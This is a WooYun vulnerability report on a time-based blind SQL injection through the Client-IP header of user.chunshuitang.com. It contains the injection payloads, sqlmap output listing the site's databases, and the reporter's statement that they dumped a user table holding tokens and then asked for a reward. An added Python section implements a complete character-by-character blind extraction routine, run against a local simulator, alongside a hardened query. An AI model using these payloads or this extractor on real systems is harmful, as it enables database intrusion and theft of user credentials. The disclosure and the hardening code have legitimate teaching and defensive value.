WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-06-28: Details sent to the vendor, awaiting vendor handling
2015-06-30: Vendor has confirmed; details disclosed to the vendor only
2015-07-10: Details disclosed to core white hats and experts in the relevant field
2015-07-20: Details disclosed to regular white hats
2015-07-30: Details disclosed to intern white hats
2015-08-14: Details disclosed to the public
Heaven and earth are not benevolent; they treat all things as straw dogs. 【HD】 In the team's name, for personal honour, building network security together.
Request packet:

GET /register HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http://user.chunshuitang.com/
Cookie: CPSSID=hk2tviec4h7cvnklt4ahs3e9o7
Host: user.chunshuitang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 1400 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(20)))qMAz)#'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[13:47:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[13:47:05] [INFO] fetching database names
[13:47:05] [INFO] fetching number of databases
[13:47:05] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[13:47:05] [INFO] retrieved:
[13:47:05] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
2
[13:47:47] [INFO] retrieved: information_schema
[14:11:51] [INFO] retrieved: c
available databases [2]:
[*] c
[*] information_schema
[14:12:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\user.chunshuitang.com'
[*] shutting down at 14:12:53
The C database has 70 tables.
I saw an appuser table and dumped it while I was at it.
I have never downloaded the app, so I don't know your login scheme, but the token should be equivalent to a password, right? Because the dump runs too slowly, I didn't dump the other database.
Any gift?
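The sqlmap run above is a time-based blind injection: every bit of "2", "information_schema" and "c" was recovered by asking the database a yes/no question and measuring whether the response was delayed, which is why two database names took 25 minutes. The following is an added example, not code from the report, from sqlmap or from the vendor, that replays that oracle locally. It assumes a hypothetical server that concatenates the Client-IP header into a SELECT (the report does not show the real query), a stand-in for MySQL that sleeps only when the injected IF() condition is true, and constructed sample data for the schema names; the probe shape ASCII(SUBSTRING(...))>n with a binary search over the character code is the standard technique. The hardened form at the end validates the header as an IP address and binds it as a parameter.

```python
"""
Time-based blind SQL injection through a trusted Client-IP header, played out
end to end against a local simulator (added example; not code from the report).

Assumptions not in the original report: the server splices the header into a
SELECT by string concatenation, and MySQL is replaced by a stand-in that honours
IF(<cond>,SLEEP(d),0) only for the probe shape the extractor sends, so the
example runs offline.
"""
import ipaddress
import re
import time

# Constructed sample data: what the simulated backend would answer.
SECRET_SCHEMAS = ["c", "information_schema"]


def vulnerable_query(client_ip: str) -> str:
    """Hypothetical vulnerable server code: the header is spliced into SQL."""
    return f"SELECT COUNT(*) FROM ip_blacklist WHERE ip = '{client_ip}'"


def is_valid_client_ip(value: str) -> bool:
    """Hardening step 1: a Client-IP header must parse as an IP address."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def hardened_query(client_ip: str):
    """Hardening step 2: validated value, bound as a parameter, never spliced."""
    if not is_valid_client_ip(client_ip):
        raise ValueError("Client-IP is not an IP address")
    return "SELECT COUNT(*) FROM ip_blacklist WHERE ip = %s", (client_ip.strip(),)


# --- stand-in for the MySQL backend -------------------------------------------
_PROBE = re.compile(r"ASCII\(SUBSTRING\(\((.+?)\),(\d+),1\)\)>(\d+)")
_SCHEMA = re.compile(r"SELECT schema_name FROM information_schema\.schemata LIMIT (\d+),1")


def _subquery_value(expr: str) -> str:
    """Evaluate the two subqueries the extractor uses (hypothetical simulator)."""
    if expr == "SELECT COUNT(*) FROM information_schema.schemata":
        return str(len(SECRET_SCHEMAS))
    m = _SCHEMA.fullmatch(expr)
    if m:
        i = int(m.group(1))
        return SECRET_SCHEMAS[i] if i < len(SECRET_SCHEMAS) else ""
    raise ValueError(f"simulator does not support: {expr}")


def simulated_mysql(sql: str, delay: float) -> None:
    """Sleeps for `delay` seconds iff the injected IF() condition holds; the
    delay is the only thing the attacker can observe in a blind injection."""
    m = _PROBE.search(sql)
    if not m or f"SLEEP({delay})" not in sql:
        return
    expr, pos, threshold = m.group(1), int(m.group(2)), int(m.group(3))
    value = _subquery_value(expr)
    # MySQL semantics: ASCII(SUBSTRING(s, pos, 1)) is 0 once pos is past the end.
    code = ord(value[pos - 1]) if pos <= len(value) else 0
    if code > threshold:
        time.sleep(delay)


# --- the attacker side -----------------------------------------------------------
def time_oracle(condition: str, delay: float = 0.05) -> bool:
    """One request: close the quoted context, attach IF(cond,SLEEP(d),0),
    comment out the remainder with '#', and decide by elapsed time."""
    header = f"1.1.1.1' AND IF({condition},SLEEP({delay}),0)#"
    sql = vulnerable_query(header)
    start = time.perf_counter()
    simulated_mysql(sql, delay)
    return time.perf_counter() - start >= delay * 0.5


def extract_string(expr: str, max_len: int = 32, delay: float = 0.05) -> str:
    """Recover one SQL expression's value character by character with a binary
    search over the ASCII code: 7 timed requests per character, strictly serial."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if time_oracle(f"ASCII(SUBSTRING(({expr}),{pos},1))>{mid}", delay):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # ASCII('') == 0: we have run past the end of the string
            break
        out += chr(lo)
    return out


def enumerate_schemas(delay: float = 0.05) -> list:
    """The same walk sqlmap made: count the schemas, then name each one."""
    count = int(extract_string("SELECT COUNT(*) FROM information_schema.schemata", delay=delay))
    return [
        extract_string(f"SELECT schema_name FROM information_schema.schemata LIMIT {i},1", delay=delay)
        for i in range(count)
    ]


if __name__ == "__main__":
    print(enumerate_schemas())
    print(hardened_query("203.0.113.7"))
    print(is_valid_client_ip("1.1.1.1' AND IF(1,SLEEP(5),0)#"))
```

The probes are issued one at a time on purpose: overlapping timed requests share the network and the database's sleep budget, so one delayed answer bleeds into the next measurement, which is the reason sqlmap's output above switches multi-threading off and warns about stressing the network adapter. The manual probe in the report used sleep(0) and a comment-bracketed polyglot so that the same header value stays syntactically valid whether it lands unquoted, single-quoted or double-quoted; sqlmap then treated the `*` in that header as its custom injection marker and substituted its own `' AND (SELECT * FROM (SELECT(SLEEP(20)))qMAz)#` there, which is the payload line it printed.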
Severity: Medium
Vulnerability Rank: 5
Confirmation time: 2015-06-30 17:14
Thanks to the reporter for the feedback. The issue has been fixed and did not affect the information security of Chunshuitang users. Thank you for your continued attention to Chunshuitang.